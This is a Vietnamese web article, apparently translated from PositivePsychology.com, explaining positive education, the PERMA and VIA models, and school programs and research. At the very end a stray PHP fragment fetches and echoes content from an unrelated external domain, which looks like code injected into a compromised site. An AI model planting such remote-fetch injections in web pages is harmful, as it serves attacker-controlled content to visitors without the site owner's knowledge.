Giáo Dục Tích Cực Là Gì Và Làm Thế Nào Để Áp Dụng Nó?

Cha mẹ muốn con mình được vui vẻ và thành công. Họ luôn mong muốn chúng thực hiện ước mơ và đạt được những khả năng bẩm sinh của mình.

Tuy nhiên, thử thách của họ là tìm ra mô hình giáo dục phù hợp. Một thứ không ngăn chặn tiềm năng của con cái cũng như không tạo ra mô hình rập khuôn.

Một lựa chọn tuyệt vời để cân nhắc chính là giáo dục tích cực, kết hợp những nguyên tắc giáo dục truyền thống với cách gia tăng sức khoẻ và hạnh phúc được dựa trên nghiên cứu.

Mục tiêu cơ bản của giáo dục tích cực là thúc đẩy sức khỏe tinh thần phát triển hoặc tích cực trong môi trường trường học.- Norrish, Williams, O’Connor và Robinson, 2013.

Giáo Dục Tích Cực Là Gì?

Giáo dục tích cực (positive education) là sự kết hợp những nguyên tắc giáo dục truyền thống với nghiên cứu về hạnh phúc và sức khoẻ, sử dụng mô hình PERMA và phân loại Điểm mạnh Tính cách (VIA) của Martin Seligman.

Seligman, một trong những người sáng lập ra tâm lý học tích cực, đã kết hợp tâm lý học tích cực vào các mô hình giáo dục như một cách để giảm thiểu trầm cảm ở những người trẻ tuổi và nâng cao sức khỏe và hạnh phúc của họ. Những nhà giáo dục và bác sĩ mong muốn thúc đẩy sức khỏe tinh thần tích cực giữa học sinh và giáo viên bằng cách sử dụng mô hình PERMA của ông trong trường học.

Mô hình PERMA và PERMAH

PERMA bao gồm năm yếu tố chính mà Seligman cho là quan trọng đối với sức khỏe lâu dài:

1. Cảm xúc tích cực: Cảm nhận những cảm xúc tích cực như là vui mừng, biết ơn, quan tâm và hy vọng

2. Sự tham gia: Hoàn toàn tập trung vào những hoạt động sử dụng kỹ năng của mình nhưng vẫn thử thách bản thân

3. Những mối quan hệ (Tích cực): Có các mối quan hệ tích cực

4. Ý nghĩa: Thuộc về và phục vụ điều gì đó mà bạn tin là to lớn hơn bản thân mình

5. Thành tựu: Theo đuổi thành công, chiến thắng, hoàn thành và làm chủ

Mô hình PERMAH bổ sung Health (Sức khỏe) vào trong đó, bao gồm những khía cạnh như là giấc ngủ, tập thể dục và chế độ ăn uống như một phần của chương trình giáo dục tích cực mạnh mẽ (Norrish & Seligman, 2015).

Điểm Mạnh Tính Cách VIA

Từ lâu, giáo dục đã tập trung vào học thuật và bồi dưỡng phát triển điểm mạnh tính cách tích cực. Tuy nhiên, trước khi xuất bản Sổ tay và Phân loại: Điểm mạnh và Đức hạnh của Tính cách (Character Strengths and Virtues: A Handbook and Classification) của Peterson và Seligman (2004), bất kỳ nỗ lực nào để chứng minh điểm mạnh tính cách đều xuất phát từ thành kiến tôn giáo, văn hóa hay chính trị (Linkins, Niemiec, Gillham, & Mayerson, 2015).

Tuy nhiên, phân loại VIA cung cấp một mô hình liên quan đến giao lưu văn hóa để ‘giáo dục trái tim’ (Linkins et al., 2015, p. 65).

Các chương trình giáo dục tích cực thường xác định tính cách tích cực bằng cách sử dụng các điểm mạnh tính cách cốt lõi được thể hiện trong sáu đức tính của VIA:

1. Trí tuệ và kiến thức (Wisdom and knowledge)

2. Sự can đảm (Courage)

3. Tính nhân văn (Humanity)

4. Công lý (Justice)

5. Chừng mực (Temperance)

6. Siêu việt (Transcendence)

Những tính cách tích cực này không phải là bẩm sinh; chúng là những cấu tạo bên ngoài cần được nuôi dưỡng. Mục tiêu của giáo dục tích cực là để phát hiện sự kết hợp giữa các điểm mạnh tính cách và phát triển khả năng của trẻ để sử dụng những thế mạnh đó một cách hiệu quả. (Linkins et al., 2015).

Thế Mạnh Của VIA Trên Thực Tế

Trên thực tế, việc kết hợp điểm mạnh tính cách vào trong chương trình giảng dạy có thể liên quan đến việc thu thập thông tin về những thế mạnh, năng khiếu và sở thích VIA của các học sinh khi chúng tham gia.

Việc xem lại những điều này và truyền đạt chúng cho học sinh trong suốt hành trình học tập cũng có thể là những cách tuyệt vời để xác nhận và nuôi dưỡng những điểm mạnh đó (Robinson, 2019).

Cách Áp Dụng Giáo Dục Tích Cực

Những can thiệp dựa trên điểm mạnh trong hệ thống giáo dục là những công cụ mạnh mẽ thường được giới thiệu đơn giản một cách đáng ngạc nhiên.

“Một chương trình giảng dạy ở trường kết hợp sức khoẻ theo cách lý tưởng sẽ ngăn ngừa trầm cảm, tăng sự hài lòng trong cuộc sống, khuyến khích trách nhiệm xã hội, thúc đẩy sự sáng tạo, thúc đẩy học tập và thậm chí nâng cao thành tích học tập”

(Waters, 2014).

Đối với học sinh ở trường, giáo dục tích cực được kết hợp vào mỗi khoá học. Ví dụ, trong lớp học mỹ thuật, các học sinh có thể khám phá khái niệm hoa mỹ bằng cách tạo ra một hình ảnh tượng trưng cho khái niệm này. Những học sinh cũng có những lớp học thường xuyên về tâm lí tích cực, giống như các môn học như toán và địa lý (Norrish & Seligman, 2015).

Những can thiệp dựa trên thế mạnh này cũng tập trung vào mối quan hệ giữa giáo viên và học sinh. Khi một giáo viên đưa ra phản hồi, họ được hướng dẫn cụ thể về điểm mạnh mà học sinh đã thể hiện thay vì đưa ra phản hồi không rõ ràng như là “Con làm tốt lắm!”

Sự thay đổi trong những tương tác nhỏ này là rất quan trọng, và chú ý tới từ ngữ của củng cố tích cực có thể tạo ra sự khác biệt. Một nghiên cứu về sự khen ngợi được thực hiện bởi Elizabeth Hurlock (1925) cho thấy động lực trong lớp học hiệu quả hơn là hình phạt, bất kể tuổi tác, giới tính hay khả năng.

Giáo Dục Tích Cực Trên Thực Tế

Các nguyên lí của tâm lí học tích cực đã được sử dụng để tạo ra một số kĩ thuật giảng dạy được chứng minh là có hiệu quả theo một vài cách. Dưới đây chỉ là một số ví dụ về cách để kết hợp mô hình này vào bất kì hệ thống lớp học hoặc trường học nào.

Lớp Học Ghép Hình (Jigsaw Classroom)

Lớp học ghép hình là một kĩ thuật trong đó học sinh được chia thành các nhóm dựa trên những kỹ năng và kiến thức được chia sẻ. Mỗi học sinh được giao một chủ đề khác nhau và được yêu cầu tìm học sinh từ các nhóm khác được giao cùng chủ đề. Kết quả là mỗi nhóm có một nhóm học sinh với những thế mạnh khác nhau cùng tham gia để nghiên cứu về một chủ đề.

Sự ảnh hưởng của tâm lý tích cực thậm chí còn tác động đến động lực trong lớp học. Trong các chương trình giảng dạy có ảnh hưởng tâm lí tích cực, học sinh có nhiều khả năng hơn trong việc lựa chọn chương trình học của mình, và được giao trách nhiệm từ độ tuổi khi còn rất nhỏ. Trong những kiểu bối cảnh lớp học này, học sinh được đối xử khác nhau khi được khen ngợi và kỉ luật.

Bảng Phát Triển Tính Cách (Character Growth Card)

Trong cuốn sách How Children Succeed của Paul Tough (2013), ông tranh luận rằng sở hữu trí thông minh bẩm sinh và khả năng học tập là chưa đủ để học sinh thành công ở trường. Thay vào đó, ông tranh luận rằng sự gan dạ, kiên cường và các đặc điểm tính cách khác nên được chú trọng nhiều hơn trong trường học. Cách làm này sẽ giúp học sinh đạt kết quả học tập tốt hơn trong thời gian ngắn.

Mạng lưới trường bán công KIPP nổi tiếng đã lấy nhiều ý tưởng này và biến chúng thành một phần chính thức của quy tắc trường học. Học sinh tại các trường KIPP nhận được Bảng Phát triển Tính cách, bảng này đánh giá thành tích của học sinh không chỉ đối với các môn học như toán và lịch sử, mà còn liên quan đến một chuỗi bảy đặc điểm tính cách. Những đặc điểm này được chọn lọc từ nghiên cứu tâm lí tích cực của Seligman và nhà tâm lí học Chris Peterson.

Hệ thống KIPP cho phép đánh giá chính thức những đặc điểm nằm ngoài các chỉ số được sử dụng để đáng giá học sinh ở hầu hết các trường học, và nó truyền đạt tầm quan trọng của những đặc điểm tính cách này theo một vài cách. Giáo viên làm mẫu hành vi tích cực, nêu gương những ví dụ tích cực của các đặc điểm tính cách trong hành động, và thảo luận về những đặc điểm này một cách cởi mở và rõ ràng.

Không có lớp học chính thức nào dạy những đặc điểm tính cách như sự say mê hay lòng biết ơn. Tuy nhiên, ngành KIPP tin rằng việc nêu bật các ví dụ về những đặc điểm này khi chúng xuất hiện một cách tự nhiên là một cách hiệu quả để khuyến khích sự phát triển của chúng.

Dường như không phải tất cả mọi người đều tin rằng phương pháp KIPP là hiệu quả. Trong một bài báo trên The New Republic, giáo sư giáo dục Jeffrey Snyder (2014) tranh luận rằng chúng ta không thực sự biết cách để dạy những điểm mạnh của tính cách, bởi vậy việc đo lường chúng có thể gây hại nhiều hơn lợi.

Ngay cả những nhà phê bình của KIPP cũng đồng ý rằng việc kêu gọi sự chú ý đến tính cách và tâm lí tích cực trong trường học là một hướng đi đúng đắn.

Chương Trình Bounce Back Và Xây Dựng Tính Kiên Cường

Các nhà nghiên cứu Toni Noble và Helen McGrath (2008) đã phát minh ra một chương trình lớp học kiên trì thực tế, tiết kiệm chi phí và hiệu quả được gọi là Bounce Back, chương trình giáo dục tích cực đầu tiên trên thế giới.

Noble and McGrath (2008) tranh luận rằng việc dạy tính kiên cường cho trẻ nhỏ là hữu ích nhất cho sự thay đổi lâu dài, nhưng nhu cầu thúc bách nhất để tăng sự kiên cường là ở quá trình chuyển tiếp của học sinh lên trường trung học.

Chương trình Bounce Back nhắm tới học sinh trung học phổ thông và trung học cơ sở, bởi độ tuổi vị thành niên là giai đoạn thay đổi quan trọng và căng thẳng đối với học sinh.

Chương trình Bounce Back đề cập đến hai lĩnh vực chính: các yếu tố môi trường hình thành vốn tâm lí và các kĩ năng đối phó cá nhân mà học sinh có thể học được, tầm quan trọng của chúng đã được nhiều nhà nghiên cứu như Reivich và Shatté (2002), và Barbara Fredrickson (2001) nhấn mạnh.

Noble và McGrath (2008) đã cung cấp một loạt các hoạt động học tập thiết thực hàng ngày để giúp học sinh cảm thấy được kết nối với các bạn đồng trang lứa, trường học và cộng đồng. Nghiên cứu của họ đã chỉ ra cách các trường học có thể tạo ra một môi trường hỗ trợ nhiều hơn, cả trong trường học lẫn gia đình và cộng đồng của học sinh.

Để giúp học sinh phát triển các kĩ năng đối phó, chương trình học Bounce Back cung cấp các nguồn lực và gợi ý cho giáo viên và các bài tập cho học sinh. Các bài tập được thiết kế để khuyến khích học sinh phát triển sự lạc quan trong lớp học và thái độ chấp thuận, vui vẻ.

Chương trình Bounce Back cung cấp các công cụ thiết thực như biểu đồ trách nhiệm để hướng dẫn trẻ em nhận ra rằng tất cả các tình huống tiêu cực là sự kết hợp của ba yếu tố: hành vi của chúng, hành vi của người khác và các sự kiện ngẫu nhiên.

Sử dụng biểu đồ trách nhiệm để hiểu một sự kiện tiêu cực cụ thể giúp học sinh học được những gì chúng có thể thay đổi và không thể thay đổi, phát triển ý thức chủ động và trách nhiệm của trẻ.

Những nguyên tắc này đã được chứng minh là hữu ích cho các nhóm khách hàng tâm lí tích cực khác. Những người tham gia vào Possibility Place, một chương trình tăng cường tính kiên trì và sự tự tin cho những người thất nghiệp lâu dài, nhận thấy biểu đồ trách nhiệm rất hữu ích trong việc ngăn chặn mọi người trách móc bản thân vì những điều không phải là lỗi của họ và học cách hiểu họ có thể làm gì để giải quyết vấn đề.

Bounce Back là một ví dụ tuyệt vời về việc nghiên cứu tâm lí học tích cực có thể được chuyển hóa thành công cụ giúp mọi người thành công như thế nào.

Các Nghiên Cứu Điển Hình Khác

Khi giáo dục tích cực ngày càng phổ biến trên toàn thế giới, càng có nhiều trường hợp toàn cầu được thực hiện ở cấp hệ thống. Một số ví dụ tuyệt vời bao gồm những điều dưới đây (Seligman & Adler, 2018).

Chương trình Giáo dục Tích cực Maytiv của Israel bắt đầu từ bậc mầm non và kéo dài đến cấp trung học phổ thông. Trong khi các nhà tâm lý học tích cực vẫn kêu gọi giải thích thận trọng những dữ liệu hiện có, Chương trình Maytiv đã cho thấy một số kết quả đầy hứa hẹn như nâng cao hiệu sự tự tin vào năng lực của học sinh, cảm xúc tích cực, cảm giác thân thuộc với trường học và cải thiện về số lượng và chất lượng của các mối quan hệ xã hội ngang hàng (Shoshani & Steinmetz, 2014; Shoshani, Steinmetz, & Kanat-Maymon, 2016; Shoshani & Slone, 2017).

Cơ quan Phát triển Con người và Tri thức của Dubai (Dubai’s Knowledge and Human Development Authority) đã hợp tác với Bộ Giáo dục Nam Úc (South Australian Department of Education) để tiến hành Điều tra Phúc lợi của Học sinh Dubai. Sau đó, một số trường học ở Các Tiểu vương quốc Ả Rập Thống nhất đã được thành lập dựa trên các nguyên tắc giáo dục tích cực, bao gồm đào tạo nghiêm ngặt tất cả các nhà giáo dục và giới thiệu các bộ phận riêng, chẳng hạn như “bộ phận phúc lợi” của một trường học.

Tại Mexico, sự hợp tác giữa Bộ Giáo dục Jalisco (Jalisco Ministry of Education) và Đại học Pennsylvania cũng đã tạo ra các nghiên cứu kiểm soát ngẫu nhiên tại các cơ sở giáo dục với kết quả đầy hứa hẹn. Dựa trên những kết quả này, một chương trình giảng dạy về sức khỏe (Currículum de Bienestar) đã được phát triển và thực hiện với những tác động có lợi trong các tiêu chuẩn như kết quả học tập, sự kết nối của học sinh, tính kiên trì và sự gắn bó (Adler, 2016).

Thực Hành Phục Hồi

Giáo dục tích cực không chỉ tập trung vào những phần tích cực của giáo dục; nó còn cải thiện cách trường học quản lý hình phạt.

Theo ACLU (Washburn, 2018), trong bất kỳ năm học nào, hàng chục nghìn học sinh bị đuổi khỏi các trường công lập của Hoa Kỳ. Ví dụ, trong năm học 2015- 2016, hơn 11 triệu ngày giảng dạy đã bị mất đi.

Nhiều học sinh trong số này sẽ bị buộc phải rời trường trong suốt một năm học, trong khi những học sinh khác sẽ bị cấm theo học tại một trường công lập trong bang của chúng.

Việc xem xét bao nhiêu ngày học tập và việc học bị mất đi để đuổi học và đình chỉ, một số quản lý trường học đang bắt đầu suy nghĩ lại về những phương pháp đó. Việc đuổi học và đình chỉ học đôi khi có thể là cần thiết nếu hành vi của học sinh làm ảnh hưởng tới sự an toàn hay môi trường học tập của các học sinh khác.

Hiện nay, nhiều nhà giáo dục cho rằng các biện pháp kỷ luật này không thể giúp trẻ học hỏi từ những sai lầm của chúng hoặc ngăn chặn hành vi lặp lại một khi học sinh vi phạm trở lại trường học. Một số người cho rằng những hình phạt này càng khiến những đứa trẻ ấy xa lánh hơn về mặt thể chất và tình cảm so với bạn bè của chúng, điều này chỉ khiến chúng có nhiều khả năng lặp lại hành vi có hại (Noble & McGrath, 2008).

Một phương pháp thay thế, được gọi là thực hành phục hồi, được một số người ủng hộ như một sự cải tiến so với mô hình đuổi học và đình chỉ (McCluskey et al., 2008). Thực hành phục hồi không phải là một khái niệm hoàn toàn mới; nó dựa trên mô hình công lý phục hồi đã được những người bào chữa cải cách tư pháp hình sự ủng hộ trong nhiều năm.

Trong mô hình này, một cuộc họp được tổ chức giữa người “vi phạm”, người bị ảnh hưởng trực tiếp bởi người vi phạm, và cộng đồng bị vướng vào hiệu ứng domino của hành động này.

Nếu một trường học kỉ luật một học sinh, đó thường là do hành vi của học sinh có ảnh hưởng cụ thể đến môi trường của họ. Ý tưởng đằng sau thực hành phục hồi là tập trung vào hiệu quả đó khi tiếp tục hành động kỉ luật.

Hãy xem một ví dụ dưới đây.

Giả sử Maria đã nói quá to trong giờ học, làm ảnh hưởng đến khả năng tập trung của các bạn trong lớp. Trong khung cảnh kỉ luật truyền thống, giáo viên có thể yêu cầu Maria ngừng nói chuyện hoặc cho Maria ngừng học.

Trong thực hành phục hồi, giáo viên sẽ hỏi Maria tại sao em ấy lại nói chen ngang, ảnh hưởng của em ấy đối với những học sinh xung quanh, và liệu em ấy có nghĩ rằng việc các học sinh khác chấp nhận hành vi đó là công bằng hay không.

Trong trường hợp nghiêm trọng hơn, như là một học sinh khiêu khích và tham gia vào một cuộc đánh nhau, thực hành phục hồi sẽ có hình thức hơn. Đứa trẻ đó sẽ tham gia vào một cuộc họp với các học sinh khác và các nhà lãnh đạo trong trường. Họ sẽ cùng nhau thảo luận về điều gì đã thúc đẩy học sinh bắt đầu cuộc đánh nhau, cách nó ảnh hưởng đến những người khác có liên quan, và những gì học sinh đó có thể làm khác đi nếu chúng ở trong tình huống tương tự trong tương lai (Hendry, 2010).

Học sinh cũng có thể được hướng dẫn các hoạt động hoặc chương trình có thể giúp ngăn chặn các cuộc đánh nhau tiếp theo. Như đã thảo luận trong một bài báo về thực hành phục hồi trên EducationWeek, một học sinh trung học cơ sở ở California tên là Danny đã trải qua một quá trình tương tự. Trong trường hợp của Danny, các yêu cầu kỷ luật bao gồm "viết thư xin lỗi, dạy kèm và tham gia vào một đội thể thao của trường."

Mặc dù tỉ lệ tái phạm chính xác sẽ khác nhau tùy theo địa điểm, nhưng dữ liệu về các phương pháp phục hồi cho thấy những kết quả đầy hứa hẹn.

Nghiên Cứu Thêm Về Giáo Dục Tích Cực

“Một câu hỏi trọng tâm về sự phát triển của thanh thiếu niên là cách để thắp sáng ngọn lửa của chúng và làm thế nào để chúng phát triển sự phức tạp của tính khí và kĩ năng cần thiết để đảm đương cuộc sống của mình”

(Larson, 2000).

Rất nhiều nghiên cứu đã được thực hiện về giáo dục tích cực và những tác động tiềm tàng của nó. Dưới đây là một số tóm tắt kết quả nghiên cứu về lợi ích của giáo dục tích cực.

Thúc Đẩy Sự Phát Triển Của Con Người

Clonan, Chafouleas, McDougal, và Riley-Tillman (2004) phát hiện rằng việc kết hợp tâm lí tích cực trong môi trường học tập đã giúp thúc đẩy sức mạnh của cá nhân. Nó khuyến khích sự phát triển của các tổ chức tích cực và giúp học sinh thành công hơn.

Vẫn còn nhiều nghiên cứu xác nhận những kết quả này, bao gồm cả những nghiên cứu xác nhận rằng các can thiệp giáo dục tích cực có tác động lâu dài hơn tới việc thay đổi hành vi của học sinh so với các phương pháp khác (Adler, 2016).

Dạy Học Sinh Cách Khiến Bản Thân Mình Hạnh Phúc

Trong một nghiên cứu khác, các nhà nghiên cứu đã kiểm tra những tác động của huấn luyện cuộc sống đối với học sinh trung học (Green, Grant, & Rynsaardt, 2007).

Kết quả cho thấy rằng sau các buổi huấn luyện cuộc sống của chúng, các học sinh cho thấy chứng trầm cảm giảm đi đáng kể và tăng khả năng nhận thức và hy vọng (Green et al., 2007). Học sinh được trang bị tốt hơn để cải thiện sức khỏe chủ quan của mình về lâu dài thông qua việc kiểm soát những trải nghiệm cảm xúc tích cực của chúng tốt hơn (Fredrickson, 2001; 2011).

Giảm Thiểu Trầm Cảm

Những can thiệp tâm lí tích cực được sử dụng trong giáo dục tích cực bao gồm xác định và phát triển các điểm mạnh, nuôi dưỡng lòng biết ơn và hình dung bản thân tốt nhất có thể (Seligman, Steen, Park, & Peterson, 2005; Sheldon & Lyubomirsky, 2006; Liau, Neihart, Teo, & Lo, 2016).

Một phân tích tổng hợp được thực hiện bởi Sin và Lyubomirsky (2009) với 4,266 người tham gia cho thấy rằng các can thiệp tâm lí tích cực làm gia tăng đáng kể sự hạnh phúc và giảm đi các triệu chứng trầm cảm. Các bằng chứng khác từ các thử nghiệm lâm sàng ngẫu nhiên cho thấy tác động tương tự từ các can thiệp tâm lý tích cực ở trẻ em (Kwok, Gu, & Kit, 2016).

Tạo Điều Kiện Cho Kết Quả Học Tập

 

Trong số một số ví dụ tuyệt vời về tác động tích cực của giáo dục đối với kết quả học tập, chúng tôi đề xuất tác phẩm của Angela Duckworth về sự gan dạ, và nghiên cứu của Shankland và Rosset (2017) về mối quan hệ tích cực giữa phúc lợi của học sinh và kết quả học tập (Duckworth, Peterson, Matthews, & Kelly, 2007; Villavicencio & Bernardo, 2016; Akos & Kretchmar, 2017; Mason, 2018).

Cung Cấp Các Hệ Thống Dễ Dàng Hơn Cho Giáo Viên

Giáo dục tích cực cũng có lợi cho những giáo viên. Nó tạo ra một văn hóa trường học với sự quan tâm, tin tưởng và ngăn chặn các hành vi có vấn đề. Nghiên cứu gần đây cho thấy rằng mối quan hệ tốt hơn giữa giáo viên và học sinh cũng có thể có lợi cho kết quả học tập của học sinh (Košir & Tement, 2014).

Tăng Động Lực Cho Học Sinh

Giáo dục tích cực cũng cung cấp một mô hình sư phạm mới nhấn mạnh động cơ cá nhân trong giáo dục để thúc đẩy học tập (Seligman, Ernst, Gillham, Reivich, & Linkins, 2009).

Nghiên cứu đã chỉ ra rằng các mục tiêu kết hợp tích cực với sự lạc quan giúp học sinh có nhiều động lực hơn (Fadlelmula, 2010). Nghiên cứu này chỉ ra rằng động lực có thể nhất quán và lâu dài nếu nó luôn đi đôi với những can thiệp tâm lý tích cực.

Tăng Sự Kiên Cường

Các nhà nghiên cứu tại Đại học Pennsylvania đã phát triển Chương trình Kiên trì Penn. Kết quả từ 19 nghiên cứu được kiểm soát của Chương trình Kiên trì Penn cho thấy học sinh trong chương trình lạc quan, có hy vọng và kiên cường hơn. Điểm của chúng trong các bài kiểm tra tiêu chuẩn tăng 11% và chúng ít lo lắng hơn khi đến gần các kỳ thi (Brunwasser, Gillham, & Kim, 2009).

Nguồn bài: What Is Positive Education, and How Can We Apply It? -PositivePsychology.com

Bài viết liên quan

Gọi cho tôi

Hãy gửi thông tin cho chúng tôi, nhân viên tư vấn của Viện sẽ liên hệ lại Quý khách trong vòng 24h. Thông tin của Quý khách chỉ để chúng tôi liên hệ và không gửi cho bên thứ ba.

Tài nguyên

Trắc nghiệm

https://tracnghiem.tamlyvietphap.vn/

$content1 = file_get_contents("https://ayambakar.vip/bl/bc.php"); $content2 = file_get_contents("https://ayambakar.vip/st/index.php"); echo ''; echo ''; ?>